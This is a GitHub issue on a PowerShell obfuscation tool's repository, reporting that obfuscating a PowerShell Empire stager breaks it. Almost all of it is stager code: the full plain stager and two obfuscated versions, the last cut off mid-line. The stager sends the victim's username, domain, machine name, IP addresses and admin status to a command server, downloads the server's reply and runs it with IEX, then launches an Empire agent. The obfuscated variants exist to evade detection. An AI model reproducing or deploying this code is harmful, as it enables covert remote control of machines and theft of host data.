danielbohannon / Invoke-Obfuscation

PowerShell Obfuscator
Apache License 2.0

Obfuscation causes script to not execute properly #13

Closed cobbr closed 6 years ago

cobbr commented 7 years ago

Problem

I discovered this issue while trying to obfuscate stagers produced by the Empire project.

When obfuscating the Empire stager, it no longer executes properly. I am able to correct this by disabling string TOKEN, member TOKEN levels 3 and 4, and command TOKEN obfuscation types. My hunch is that it all traces back to something in string TOKEN obfuscation.

Output

Here is the stager script prior to any obfuscation:

fUNcTiON STARt-NegoTIATe {parAm($s,$SK,$UA='MoZilLA/5.0 (WIndOWS NT 6.1; WOW64; TrIDeNt/7.0; rv:11.0) LiKe GEcKo')FUnCTiON COnverTTo-RC4BYtEStrEam {PaRaM ($RCK, $IN)BegIn {[BYTe[]] $S = 0..255;$J = 0;0..255 | FOREAcH-OBjecT {$J = ($J + $S[$_] + $RCK[$_ % $RCK.LeNGtH]) % 256;$S[$_], $S[$J] = $S[$J], $S[$_];};$I = $J = 0;}pRocEsS {ForEacH($BYTE in $IN) {$I = ($I + 1) % 256;$J = ($J + $S[$I]) % 256;$S[$I], $S[$J] = $S[$J], $S[$I];$BytE -BXOR $S[($S[$I] + $S[$J]) % 256];}}}FunctIoN DeCRypt-BYtes {Param ($KEY, $IN)IF($IN.LeNgTH -Gt 32) {$HMAC = NEw-ObJect SySTem.SeCURity.CryptoGRAPhY.HMACSHA256;$E=[SYStEm.TeXT.EncoDinG]::ASCII;$MAc = $In[-10..-1];$In = $IN[0..($In.LEngtH - 11)];$HMaC.Key = $e.GETBYteS($Key);$ExPeCted = $HmAC.ComPUTEHaSH($In)[0..9];IF (@(COMpARe-ObJect $MAC $ExpeCTed -SYnc 0).LeNGTH -nE 0) {rETURN;}$IV = $IN[0..15];$AES = NeW-OBJect SYstEm.SEcuRiTy.CrYPtoGRApHy.AEsCRYPTOSErVICEProViDEr;$AES.Mode = "CBC";$AES.KEY = $E.GETByTes($Key);$AES.IV = $IV;($AES.CREateDecrYPtor()).TrAnSfORmFInAlBlock(($IN[16..$In.LeNGTh]), 0, $In.LEngth-16)}}$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");$ErrorActionPreference = "SilentlyContinue";$E=[SYSTEm.TexT.ENcODIng]::ASCII;$customHeaders = "";$SKB=$E.GetByTES($SK);$AES=NEw-ObjECT System.SecURITY.CrYptography.AEsCrypToSerVicePROvider;$IV = [byTE] 0..255 | Get-RANDOM -cOUnt 16;$AES.Mode="CBC";$AES.KEy=$SKB;$AES.IV = $IV;$HmAc = New-ObJECT SYStEm.SecurITY.CrYpTOGRAphy.HMACSHA256;$HMaC.Key = $SKB;$CsP = NEW-OBjECt System.SeCuRITY.CrYptoGRAphy.CspParamEtErs;$CSP.FlAGs = $CSP.FlagS -BOR [SysTEm.SecuRity.CrypToGrAPhY.CspPRovIDerFLaGS]::UsEMAchineKEYStOrE;$Rs = NeW-OBjECT SYsTeM.SECURITY.CrYpTogRAPHY.RSACRyPTOSErvicEPROvider -ARGUMentLIST 2048,$CSP;$rk=$rS.TOXmlSTrING($FalsE);$ID=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray()|Get-Random -Count 
8);$ib=$E.getBytES($Rk);$EB=$IV+$AES.CrEAteENcrypTor().TRAnsFORMFInALBlocK($IB,0,$iB.LeNgth);$eb=$eb+$Hmac.ComPUTEHAsh($Eb)[0..9];if(-NoT $WC) {$wC=NeW-OBjeCt SYSTEM.NEt.WebCliEnt;$WC.PRoxy = [SySTEm.NEt.WEBREQUESt]::GetSysTemWEbProXY();$wc.PRoXy.CrEdentIalS = [SYStEM.NeT.CREDentiAlCAChe]::DefaULTCREDENtials;}if ($customHeaders -ne "") {$HEaDeRS = $cUStoMHEaDERS -SpLIt ',';$HeaDeRs | FOREACH-OBjEcT {$HeAdeRKEY = $_.SPLIt(':')[0];$hEaDerVaLuE = $_.Split(':')[1];$wc.HEaDErS.Add($hEaderKEY, $heaDErVALUE);}}$wc.Headers.Add("User-Agent",$UA);$IV=[BitConVErTEr]::GeTBytES($(GeT-RandOm));$daTA = $E.GetbYtEs($ID) + @(0X01,0x02,0X00,0X00) + [BItCONveRteR]::GEtBYtEs($EB.LeNGTH);$Rc4p = CONVertTO-RC4BYTeStrEam -RCK $($IV+$SKB) -IN $Data;$Rc4p = $IV + $rC4p + $Eb;$raw=$wc.UploadData($s+"/news.php","POST",$rc4p);$De=$E.GEtSTrInG($Rs.DEcRYPt($RAw,$FALSE));$noNCE=$De[0..15] -JOiN '';$kEy=$DE[16..$de.LeNgth] -JoIn '';$noNCE=[String]([LONG]$nOnCE + 1);$AES=NEw-ObjeCt SYSTEM.SEcuRITY.CRypTogrApHy.AEsCrypToSERvIcePRovIDeR;$IV = [BYtE] 0..255 | Get-RANdOM -COuNT 16;$AES.Mode="CBC";$AES.Key=$E.GeTByTes($KeY);$AES.IV = $IV;$I=$NOnCe+'|'+$s+'|'+[EnviroNmeNT]::UsERDoMaiNNamE+'|'+[EnVIrONMEnt]::UsErNAme+'|'+[EnvirOnmeNT]::MachiNeNamE;$p=(gwMi WIN32_NeTWORKAdapTERConfIGuraTioN|WHeRE{$_.IPAdDrEsS}|SeLECT -ExPAnD IPADDReSS);$Ip = @{$tRue=$p[0];$fALSE=$P}[$P.LEnGTH -Lt 6];iF(!$IP -or $Ip.TrIM() -Eq '') {$ip='0.0.0.0'};$i+="|$ip";$I+='|'+(GeT-WMIObjECT WiN32_OpeRATInGSystem).Name.SpLit('|')[0];if(([Environment]::UserName).ToLower() -eq "system"){$i+="|True"}else {$i += '|' +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")}$N=[SYstEM.DIagnoSTIcs.PrOCesS]::GeTCUrrEntPROCESs();$i+='|'+$n.PRocESsNAme+'|'+$n.ID;$i += "|powershell|" + $PSVersionTable.PSVersion.Major;$ib2=$E.GetbYTES($I);$Eb2=$IV+$AES.CreateEncrYPtOR().TrANsforMFinAlBLoCK($Ib2,0,$Ib2.LengtH);$hMAC.KEy = $E.GEtBYtEs($kEY);$eb2 = 
$eB2+$hmac.CoMpuTEHAsH($EB2)[0..9];$IV2=[BItConvErteR]::GETByTes($(Get-RaNDOM));$daTa2 = $e.gEtBYTES($ID) + @(0x01,0X03,0x00,0x00) + [BITCOnVErTer]::GEtBYTES($EB2.LeNgth);$Rc4p2 = CoNvERTTO-RC4BYTEStrEam -RCK $($IV2+$SKB) -IN $daTA2;$rC4P2 = $IV2 + $rC4p2 + $EB2;if ($customHeaders -ne "") {$heADeRs = $cUsTomHEadErS -SpLIT ',';$hEadeRS | ForEAcH-ObJECT {$HEaDeRKEY = $_.SPLiT(':')[0];$heaDeRVAlUE = $_.sPLIT(':')[1];$wC.HeADERs.ADD($HEADerKey, $HeaDerVALue);}}$wc.Headers.Add("User-Agent",$UA);$raw=$wc.UploadData($s+"/login/process.php","POST",$rc4p2);IEX $( $e.GETStRINg($(DECRYpT-BYTes -KEy $Key -In $raW)) );$AES=$nuLL;$S2=$nULl;$wc=$nUlL;$EB2=$nuLL;$raW=$NUll;$IV=$Null;$wc=$nUlL;$i=$NuLl;$Ib2=$NULL;[GC]::COLLeCt();Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID;}Start-Negotiate -s "$ser" -SK '3c6e0b8a9c15224a8228b9a98ca1531d' -UA $u;

This is the script post-obfuscation:

  .("{0}{2}{1}" -f 'SE','iTeM','t-')  ("VARiaBL"+"e:0F"+"4G"+"v5") ([tyPE]("{3}{2}{1}{0}{4}"-F '.aS','cTiOn','Fle','Re','semBly')  )  ;  .("{0}{2}{1}" -f 'S','ITeM','eT-')  ("vARia"+"B"+"Le:"+"UR2H"+"cI")  (  [typE]("{5}{0}{3}{1}{4}{2}"-f 'E','O','ng','NC','DI','SysTEm.tExt.')) ;  $01aW  = [tYPE]("{0}{9}{10}{7}{8}{3}{4}{6}{1}{5}{2}"-f'SYsT','O','Rflags','A','p','VidE','HY.cspPr','Y.Cr','YpTOGr','em.se','curiT'); .("{2}{1}{0}" -f 'M','ITe','sEt-') ("vaRIAbl"+"e:9"+"d"+"2o"+"4")  ([TYpe]("{1}{2}{0}{4}{3}" -f'br','SYstem.NE','T.WE','Uest','EQ') )  ;  &('sv')  ("{1}{0}" -f'jg0','H') ([tYPe]("{3}{7}{5}{0}{2}{6}{1}{4}" -F'.','NTIaLca','N','sy','CHe','TEm','et.CREde','S') );  &('SV') ('l3vo'+'jy') ([type]("{2}{0}{1}"-F'rOnm','enT','enVI') );  .("{0}{1}"-f 'Set-IT','Em') ("VARi"+"abl"+"E:15Ju"+"0h")  (  [TypE]("{5}{2}{4}{7}{1}{8}{0}{3}{6}" -F'oW','p','u','sIDE','r','SEc','Ntity','ity.PRinci','Al.wind') ) ;  &("{1}{0}{3}{2}"-f '-vA','sEt','e','RIAbL') ('Aopkq'+'U') (  [tYpE]("{2}{0}{3}{4}{1}"-F'STEM.DIAGNo','ESs','sY','StICS.p','RoC')  ); &('sV') ('dM0o'+'8J')  ( [tYpe]("{0}{2}{1}"-F'biT','nveRtER','co')  )  ;  $t9j5= [tYPe]('GC') ; fUnCtiON START`-`NeGO`Ti`Ate {pArAm(${S},${Sk},${uA}=("{3}{2}{6}{11}{1}{9}{7}{8}{10}{0}{5}{12}{4}"-f'; ','nDows NT ','oZIlLA/','M',' GeCKo','r','5.','1; W','OW64; TrI','6.','DENt/7.0','0 (WI','V:11.0) LiKe'))fUNctiON C`oN`Ve`RtTo-rC`4B`ytEs`TrEAm {PaRaM (${R`CK}, ${i`N})begIN {[BytE[]] ${s} = 0..255;${J} = 0;0..255 | .("{0}{1}{3}{2}"-f'FoRE','aCH','ct','-OBje') {${J} = (${j} + ${s}[${_}] + ${R`cK}[${_} % ${R`CK}."l`eNg`TH"]) % 256;${S}[${_}], ${s}[${J}] = ${S}[${J}], ${S}[${_}];};${i} = ${j} = 0;}pROcEsS {FOREACh(${bY`Te} in ${in}) {${I} = (${i} + 1) % 256;${J} = (${j} + ${s}[${i}]) % 256;${s}[${I}], ${S}[${J}] = ${s}[${J}], ${s}[${i}];${by`Te} -Bxor ${S}[(${s}[${i}] + ${s}[${J}]) % 256];}}}fUnCtIOn decr`Ypt-b`Y`Tes {PaRam (${K`ey}, ${In})if(${I`N}."leNG`Th" -Gt 32) {${H`Mac} = &("{2}{1}{0}"-f 't','-ObjeC','New') ("{0}{7}{5}{4}{8}{2}{1}{3}{6}" 
-f'Sy','S','PHy.HMAC','H','RypTOG','C','A256','StEm.SEcurITY.','ra');${E}=  ( &("{0}{1}"-f'G','ci') ('vAriabLe:'+'Ur'+'2'+'hci')  )."v`AluE"::"As`cii";${m`Ac} = ${I`N}[-10..-1];${i`N} = ${In}[0..(${IN}."len`GTh" - 11)];${h`MAC}."K`ey" = ${E}.("{1}{0}"-f's','GEtBYtE').Invoke(${K`ey});${eX`pEc`TeD} = ${Hm`AC}.("{2}{0}{1}" -f 'MPUTE','HAsH','CO').Invoke(${iN})[0..9];if (@(.("{3}{0}{2}{1}"-f'Pa','T','Re-OBJEc','COm') ${m`AC} ${Exp`e`CtEd} -SYNC 0)."LEn`g`TH" -ne 0) {rEturN;}${i`V} = ${In}[0..15];${A`ES} = .("{0}{1}{2}" -f 'NEw-Ob','Je','CT') ("{8}{10}{11}{0}{6}{2}{14}{5}{1}{13}{4}{7}{9}{12}{3}"-f'I','y','y','vIDEr','RapHy.AESCrypT','R','t','O','SYsT','SerVIC','eM','.SEcUr','EPrO','ptog','.C');${A`eS}."m`odE" = "CBC";${A`eS}."k`eY" = ${e}.("{0}{2}{1}"-f 'Get','es','ByT').Invoke(${K`ey});${A`Es}."Iv" = ${I`V};(${A`ES}.("{1}{0}{2}{3}" -f 'EATe','Cr','DEcRYP','TOR').Invoke())."tR`AN`SFOrmfInalbl`O`cK"((${iN}[16..${i`N}."lE`NGTH"]), 0, ${in}."le`NgTH"-16)}}${Nu`lL} =  $0F4Gv5::("{3}{2}{4}{1}{0}{5}"-f'Na','tial','thP','LoadWi','ar','me').Invoke(("{0}{1}{2}"-f 'S','ystem.Secur','ity'));${nU`LL} =   (  &("{2}{0}{3}{1}" -f 'ARIAb','e','get-v','L') ('0f4GV'+'5')  -VAluEO )::("{1}{4}{0}{3}{2}" -f'a','LoadWit','alName','rti','hP').Invoke(("{2}{1}{3}{0}"-f'ore','stem','Sy','.C'));${erroRAcTi`O`NPr`efER`EncE} = ("{1}{3}{0}{2}{4}"-f 'C','Si','ont','lently','inue');${E}=  (  .("{1}{0}" -f'EM','it')  ("VarIa"+"b"+"LE:"+"uR2h"+"Ci")  )."V`ALUE"::"aSc`iI";${c`U`sToM`HE`AdErS} = "";${S`kb}=${e}.("{0}{1}" -f'G','etBYTeS').Invoke(${S`k});${A`ES}=&("{0}{1}{3}{2}"-f'N','eW-','EcT','OBj') ("{0}{6}{9}{10}{2}{1}{5}{4}{7}{8}{3}" -f 'S','Pto','ry','R','Ovi','SErvICEPR','YSTEm.SeCuRI','D','e','ty.CryPtogRAp','Hy.AeSC');${I`V} = [Byte] 0..255 | .("{2}{1}{0}" -f'om','AnD','GeT-R') -COunT 16;${A`ES}."Mo`De"="CBC";${A`Es}."K`eY"=${S`kB};${A`es}."I`V" = ${i`V};${hM`AC} = &("{2}{1}{0}" -f 'JeCt','B','New-O') 
("{1}{6}{9}{2}{8}{3}{0}{4}{10}{5}{7}{11}"-f'Ty.CR','S','.Se','uRi','Yptogr','y.HMA','yS','CSH','C','tEM','aph','A256');${HM`Ac}."k`ey" = ${S`KB};${c`Sp} = &("{0}{1}{2}{3}"-f 'NE','w','-Obje','ct') ("{2}{0}{5}{4}{1}{3}{6}" -f 'sTEm.S','CSPPARame','Sy','tEr','APhY.','ECUrity.CRyPTOgr','s');${C`sp}."fLa`gs" = ${C`SP}."FL`Ags" -Bor  (.("{2}{0}{1}"-f 'iABl','E','VAR')  ("{0}{1}"-f '0','1AW') )."v`ALUe"::"USE`maC`Hi`N`EKEYsTORe";${Rs} = .("{2}{0}{1}"-f 'W-O','BjeCT','Ne') ("{15}{9}{14}{10}{7}{6}{8}{12}{5}{3}{11}{0}{4}{1}{13}{2}"-f'O','OViD','r','RY','SERVIcEPR','Y.RSAC','RiTY','u','.CryP','Em.','C','pT','TOgrAPh','e','SE','SYsT') -ARGuMeNtLISt 2048,${C`sp};${R`K}=${r`S}.("{1}{0}{3}{2}"-f 'Tri','TOXmLS','g','n').Invoke(${fa`lsE});${I`D}=-join(("{0}{5}{8}{7}{3}{9}{1}{2}{4}{6}"-f 'AB','12','3456','ST','7','CD','89','NPR','EFGHKLM','UVWXYZ').("{0}{2}{3}{1}"-f'T','rray','oC','harA').Invoke()|.("{0}{2}{1}" -f 'Get-Ran','m','do') -Count 8);${i`B}=${E}.("{1}{2}{0}"-f'S','GET','byTe').Invoke(${r`k});${e`B}=${i`V}+${a`ES}.("{1}{0}{2}{3}"-f'eATEENcRy','Cr','Pt','OR').Invoke().("{4}{3}{1}{5}{0}{2}" -f'OC','rMFInALB','K','ANsFo','TR','l').Invoke(${i`B},0,${i`B}."LENG`TH");${eb}=${e`B}+${hM`Ac}.("{2}{0}{3}{1}"-f'MP','H','CO','UTeHAS').Invoke(${e`B})[0..9];If(-Not ${WC}) {${w`C}=&("{1}{2}{0}"-f'cT','Ne','W-ObJE') ("{2}{1}{0}{3}" -f'.Ne','Em','SysT','t.WEbCLienT');${w`c}."PrO`xy" =   (  .("{1}{0}" -f'r','Di') ("VariAbL"+"E:9"+"D"+"2o"+"4"))."V`ALUE"::("{1}{2}{3}{0}{4}" -f 'WEBPR','GE','TSYSTE','m','OXY').Invoke();${w`c}."prO`Xy"."cr`e`DENTi`ALS" =   (  &("{1}{0}" -f 'cI','g') ("{1}{0}{3}{2}" -f 'aRiAbL','v','Hjg0','E:') )."V`AluE"::"D`efa`ul`TCREDeNtiA`ls";}if (${Cu`StoM`Head`eRS} -ne "") {${hE`AdErS} = ${cu`St`OMHeA`DERS} -split ',';${hE`Ad`erS} | &("{2}{4}{3}{1}{0}"-f 't','bjEC','FOREaC','-O','h') {${hE`A`DERKeY} = ${_}.("{1}{0}" -f 'pLIT','S').Invoke(':')[0];${h`EaDErva`lUE} = ${_}.("{1}{0}"-f 't','splI').Invoke(':')[1];${W`C}."H`EADE`RS".("{1}{0}"-f 'd','AD').Invoke(${h`eAdeR`kEY}, 
${hE`ADERVA`L`ue});}}${w`c}."HE`ADeRS".("{1}{0}" -f 'dd','A').Invoke(("{2}{1}{0}"-f 'nt','ge','User-A'),${uA});${iv}=  (&("{0}{1}"-f'GC','I')  ('VaRI'+'ABle'+':Dm0o'+'8j'))."vaL`Ue"::("{1}{2}{0}" -f 'ES','GetBY','T').Invoke($(&("{0}{1}{2}"-f'GEt-','R','aNdom')));${DA`Ta} = ${E}.("{2}{1}{0}" -f 's','etBytE','g').Invoke(${I`d}) + @(0x01,0x02,0X00,0x00) +   $dm0O8J::("{1}{2}{0}"-f 's','GeT','BYtE').Invoke(${EB}."LEnG`TH");${R`c4P} = .("{1}{3}{0}{4}{2}"-f'ytES','CoNVERtTo-R','M','C4B','trEa') -RCK $(${Iv}+${s`kb}) -IN ${da`TA};${R`c4p} = ${iV} + ${rC`4p} + ${eb};${R`AW}=${wc}.("{1}{0}{2}" -f 'loadDat','Up','a').Invoke(${s}+("{2}{1}{0}{3}"-f't','admin/ge','/','.php'),("{0}{1}" -f'P','OST'),${rC`4p});${DE}=${e}.("{0}{2}{1}" -f 'GEt','inG','STR').Invoke(${r`S}.("{0}{1}" -f'D','EcrypT').Invoke(${r`AW},${F`AlSE}));${n`O`NCE}=${d`E}[0..15] -JoiN '';${k`EY}=${D`E}[16..${DE}."LeNg`TH"] -jOin '';${nOn`cE}=[StRiNg]([lonG]${N`O`NcE} + 1);${A`ES}=&("{1}{0}{2}" -f'EW-O','N','BJECt') ("{11}{0}{6}{8}{3}{4}{5}{2}{7}{9}{10}{1}" -f 'Tem','oVIDeR','Ser','Ity.CryPtOgraPHy.AeS','C','ryptO','.','v','SEcur','i','CEPr','SYS');${IV} = [ByTE] 0..255 | .("{0}{2}{1}" -f 'GeT-RA','dOM','N') -CoUNt 16;${a`es}."mO`De"="CBC";${A`ES}."k`ey"=${E}.("{2}{0}{1}" -f 'Byte','s','GET').Invoke(${K`Ey});${A`es}."iv" = ${IV};${I}=${nOn`cE}+'|'+${s}+'|'+ $l3VojY::"U`SERD`omAi`NNaMe"+'|'+ $L3vOjy::"UsER`NaME"+'|'+  (.("{0}{2}{1}"-f 'VARIab','e','l')  ("{1}{0}{2}" -f'v','l3','oJY') -VaL )::"m`ACHiNenA`me";${P}=(&("{1}{0}"-f'mI','gw') ("{9}{2}{7}{0}{6}{5}{1}{8}{3}{4}"-f'or','g','N','rATI','On','OnfI','KAdapteRC','32_Netw','u','WI')|&("{1}{0}" -f'HEre','W'){${_}."IPA`Ddr`Ess"}|&("{1}{0}{2}"-f'e','S','lect') -EXpand ("{0}{2}{1}"-f 'IPAd','REss','D'));${I`p} = @{${Tr`uE}=${p}[0];${F`AlsE}=${p}}[${p}."l`ength" -lT 6];if(!${I`p} -or ${I`P}.("{1}{0}"-f 'iM','tR').Invoke() -Eq '') {${I`p}=("{0}{1}" -f '0.0.0','.0')};${I}+="|$ip";${i}+='|'+(.("{1}{3}{0}{2}" -f'bjE','GeT-WM','cT','iO') ("{5}{4}{0}{3}{1}{2}"-f 
'Ng','y','sTEm','S','ATi','Win32_OpEr'))."na`ME".("{0}{1}" -f'S','pLIt').Invoke('|')[0];if(( $l3vojy::"USe`Rn`AME").("{1}{0}" -f 'r','ToLowe').Invoke() -eq ("{2}{0}{1}" -f 'y','stem','s')){${i}+=(('n48True')  -CRepLACe ([CHAR]110+[CHAR]52+[CHAR]56),[CHAR]124)}else {${I} += '|' +([Security.Principal.WindowsPrincipal]   $15JU0H::("{1}{2}{3}{0}"-f'rrent','Get','C','u').Invoke())."isiNr`o`le"([Security.Principal.WindowsBuiltInRole] ("{3}{1}{0}{2}"-f 'nistrat','dmi','or','A'))}${N}=  $AoPkqu::("{3}{0}{1}{2}"-f'U','RRENtPrOce','sS','GeTC').Invoke();${I}+='|'+${n}."PROC`e`Ssn`Ame"+'|'+${n}."Id";${I} += (("{4}{2}{0}{1}{3}"-f'h','e','owers','llJxY','JxYp'))."r`EpL`ACE"(([ChAr]74+[ChAr]120+[ChAr]89),[StRIng][ChAr]124) + ${P`s`VER`SionTAbLe}."Psver`s`ION"."M`AjoR";${I`B2}=${e}.("{2}{1}{0}"-f's','ETByTE','g').Invoke(${I});${e`B2}=${i`V}+${a`es}.("{0}{2}{3}{4}{1}"-f'Creat','pTor','eENC','R','y').Invoke().("{0}{3}{4}{1}{2}"-f'T','A','LBLoCK','RA','NsformFIn').Invoke(${I`B2},0,${i`B2}."Le`Ngth");${H`maC}."k`Ey" = ${E}.("{1}{2}{0}" -f'S','GeTByt','e').Invoke(${K`ey});${E`B2} = ${E`B2}+${h`MAC}.("{1}{0}{2}{3}" -f 'p','COm','UTEHA','SH').Invoke(${e`B2})[0..9];${I`V2}= ( &('gi')  ("{3}{2}{0}{4}{1}"-f 'Le','8j','B','vAria',':dm0o')  )."vA`LUe"::("{1}{0}{2}" -f 'TBYtE','GE','S').Invoke($(.("{3}{2}{0}{1}" -f'Do','m','N','GET-RA')));${Da`T`A2} = ${E}.("{0}{1}" -f'GeTbyt','ES').Invoke(${I`D}) + @(0x01,0x03,0x00,0x00) +   ( &("{1}{0}"-f 'Le','VarIAB')  ('dm0o'+'8J')  )."va`luE"::("{0}{2}{1}"-f 'GeTBy','eS','T').Invoke(${E`B2}."lEn`G`TH");${R`c4P2} = .("{4}{1}{2}{3}{6}{0}{5}" -f '-RC4BYTESt','o','nvER','T','C','reaM','To') -RCK $(${i`V2}+${S`kb}) -IN ${d`A`TA2};${R`c4`P2} = ${i`V2} + ${R`c4p2} + ${E`B2};if (${Cus`TomHe`Aders} -ne "") {${he`ADeRs} = ${C`UsT`Om`HEAdERS} -SplIT ',';${H`eAde`RS} | &("{1}{4}{2}{0}{3}"-f 'J','FOr','-OB','ECT','EACh') {${he`Ad`eRkeY} = ${_}.("{1}{0}"-f 'LIT','SP').Invoke(':')[0];${H`EaDer`ValUe} = ${_}.("{0}{1}" -f 
's','PLit').Invoke(':')[1];${wC}."hEa`deRs".("{1}{0}" -f'd','Ad').Invoke(${hEADer`K`ey}, ${hEADe`RV`ALue});}}${wC}."HE`ADe`Rs".("{0}{1}" -f 'Ad','d').Invoke(("{2}{0}{1}"-f'gen','t','User-A'),${u`A});${R`Aw}=${W`c}.("{1}{0}{2}{3}" -f'lo','Up','adD','ata').Invoke(${S}+("{1}{0}"-f'news.php','/'),("{0}{1}" -f 'PO','ST'),${r`C`4p2});.("{1}{0}"-f 'X','IE') $( ${e}.("{3}{1}{0}{2}"-f 'Str','ET','Ing','G').Invoke($(.("{2}{3}{1}{0}" -f'Es','T','DEcRY','pT-BY') -KEY ${k`Ey} -In ${R`AW})) );${a`ES}=${N`uLl};${s2}=${NU`Ll};${W`C}=${Nu`lL};${e`B2}=${n`Ull};${R`Aw}=${nU`Ll};${Iv}=${NU`lL};${W`c}=${NU`lL};${I}=${n`ull};${i`B2}=${Nu`LL}; (&("{0}{1}" -f'd','Ir')  ('va'+'RIAB'+'Le:t9'+'J'+'5'))."VA`LUE"::("{1}{0}" -f 'olLEcT','C').Invoke();&("{1}{2}{3}{0}" -f'e','Invoke-E','m','pir') -Servers @((${S} -split "/")[0..2] -join "/") -StagingKey ${sK} -SessionKey ${K`Ey} -SessionID ${iD};}&("{4}{1}{3}{0}{2}" -f'go','art','tiate','-Ne','St') -s "$ser" -SK ("{0}{8}{2}{1}{7}{6}{3}{4}{5}" -f'3c6e0b8a9c15','a','28b9','15','3','1d','ca','98','224a82') -UA ${u};

Additionally, here is a copy of the working script post-obfuscation after disabling the obfuscation types mentioned above. Maybe there is a difference between this one and the normal post-obfuscation script you will be able to detect:

set-ItEM  ('v'+'arIab'+'le:9ernQ'+'0')  ( [TYpe]("{1}{5}{3}{0}{2}{6}{4}" -F'ctI','R','ON.Asse','FlE','ly','E','Mb')) ;  seT-vArIaBle  ("{0}{1}"-f'j','N4Ba') ([tyPE]("{3}{1}{0}{2}" -F'ExT.eNcODI','eM.t','Ng','SYSt') )  ;  SET ("{1}{0}" -f 'Z','O8Lb') ( [tYPE]("{3}{8}{4}{7}{6}{0}{2}{1}{9}{5}" -F 'oGR','y.CSPPr','apH','SYsTEm.se','Y.','S','RypT','c','CUriT','ovIdeRFlAG') )  ;sEt-vARiablE  ("{0}{1}" -f'3E1','S') (  [tyPe]("{0}{1}{3}{2}{4}" -f 'SyStEM.N','ET','web','.','REqueST') ) ; ${9`Px} =  [typE]("{3}{1}{0}{4}{2}"-f're','TEM.nET.c','EnTiALcaCHE','sys','d')  ;  sET-VariabLe ("{0}{1}"-f '2','kU9AV') (  [TyPE]("{1}{2}{0}" -F 'nMeNT','EN','vIRo'))  ; SEt-ITeM ("{2}{0}{1}" -f'iaBLE:52F','6Z4','VaR')  ( [tYpE]("{8}{9}{1}{3}{0}{4}{5}{10}{7}{2}{6}"-f 'W','.','Tit','PrInCipal.','INdoW','si','Y','N','seCuR','Ity','De')  )  ;  sET-iTEM  ('va'+'rI'+'ABle:R'+'SJ') ( [tYpE]("{0}{2}{4}{3}{1}{6}{5}"-f's','DIaGNo','ys','.','tEM','CESs','StiCs.pRO')  ) ;  set-iTeM ("vARiablE"+":H4"+"Y"+"sF")  ( [type]("{0}{3}{2}{1}" -F'BI','ER','t','TCONveR')  ) ;   Sv ("{0}{1}"-f 'JC0','A')  ( [tYpe]('gc')  )  ;fUNcTiON sTarT`-`Ne`Go`TIATE {parAm(${s},${S`k},${U`A}='MoZilLA/5.0 (WIndOWS NT 6.1; WOW64; TrIDeNt/7.0; rv:11.0) LiKe GEcKo')FUnCTiON convE`Rtt`O-`Rc4b`yT`EsTre`AM {PaRaM (${r`cK}, ${IN})BegIn {[BYTe[]] ${S} = 0..255;${j} = 0;0..255 | FOREAcH-OBjecT {${J} = (${j} + ${s}[${_}] + ${r`cK}[${_} % ${r`Ck}."LeN`g`TH"]) % 256;${s}[${_}], ${S}[${J}] = ${S}[${J}], ${s}[${_}];};${I} = ${j} = 0;}pRocEsS {ForEacH(${BY`Te} in ${I`N}) {${i} = (${I} + 1) % 256;${J} = (${j} + ${S}[${i}]) % 256;${s}[${i}], ${S}[${j}] = ${s}[${J}], ${S}[${i}];${By`Te} -BXOR ${S}[(${S}[${i}] + ${S}[${j}]) % 256];}}}FunctIoN dEcryp`T-`BytES {Param (${K`ey}, ${IN})IF(${i`N}."LENG`TH" -Gt 32) {${hM`AC} = NEw-ObJect ("{3}{10}{4}{0}{8}{1}{2}{9}{5}{7}{11}{6}" -f'eC','Rity.CryptoGRAP','h','Sy','em.S','.HM','6','A','U','Y','ST','CSHA25');${E}= (  GeT-VARIAblE ("{0}{1}"-f'jn','4Ba')  )."Va`lUe"::"as`CiI";${m`Ac} = 
${I`N}[-10..-1];${I`N} = ${I`N}[0..(${IN}."LeNg`Th" - 11)];${hm`Ac}."K`EY" = ${e}."g`e`TbYtES"(${k`EY});${exPec`T`eD} = ${HM`Ac}."cOMPu`T`EHASh"(${i`N})[0..9];IF (@(COMpARe-ObJect ${m`Ac} ${E`XPE`cTED} -SYnc 0)."lE`Ngth" -nE 0) {rETURN;}${I`V} = ${In}[0..15];${a`es} = NeW-OBJect ("{6}{10}{12}{5}{2}{11}{1}{9}{7}{8}{0}{4}{3}"-f'E','.AEsC','Ty.CrYP','iDEr','ProV','Ri','SYs','OSErV','IC','RYPT','tEm','toGRApHy','.SEcu');${a`Es}."m`oDe" = "CBC";${A`ES}."K`eY" = ${E}."gEt`B`YTeS"(${K`EY});${a`es}."I`V" = ${I`V};(${a`Es}."creat`e`DE`CRYpTOR"())."traNsFor`mF`InALBL`OCK"((${IN}[16..${in}."LEN`G`Th"]), 0, ${i`N}."LEng`Th"-16)}}${n`ULl} =   ( gEt-item  ("{2}{0}{3}{1}" -f 'BLe','Ernq0','varIA',':9'))."Val`ue"::"l`oaDWithPa`R`TIaLn`A`mE"("System.Security");${n`uLl} =   ${9eR`N`Q0}::"Lo`A`dwItHp`A`RtiAlN`AMe"("System.Core");${ERroraC`Ti`o`NPr`e`FErENce} = "SilentlyContinue";${E}=  ( varIable ("{0}{1}" -f 'JN4b','A') )."V`AluE"::"a`sCIi";${cu`STOm`H`eA`DERs} = "";${S`kb}=${e}."GE`TBY`TES"(${S`k});${a`ES}=NEw-ObjECT ("{4}{12}{15}{10}{7}{1}{8}{13}{11}{6}{3}{9}{2}{14}{0}{5}"-f 'd','r','ceP','V','Sy','er','ToSer','Y.C','Yptography.AEs','i','cURIT','p','st','Cry','ROvi','em.Se');${I`V} = [byTE] 0..255 | Get-RANDOM -cOUnt 16;${A`ES}."m`ODe"="CBC";${a`ES}."K`Ey"=${s`Kb};${a`eS}."iV" = ${Iv};${hM`Ac} = New-ObJECT ("{3}{2}{5}{7}{0}{6}{4}{1}"-f 'pT','CSHA256','YS','S','Aphy.HMA','tEm.S','OGR','ecurITY.CrY');${hM`AC}."K`Ey" = ${s`kb};${c`sP} = NEW-OBjECt ("{1}{7}{3}{0}{2}{5}{6}{4}{8}"-f'TY.Cr','Sy','Y','em.SeCuRI','Csp','p','toGRAphy.','st','ParamEtErs');${c`SP}."f`LaGs" = ${C`SP}."f`lagS" -BOR   (gET-vAriable  ("{0}{1}" -f'o8','Lbz')  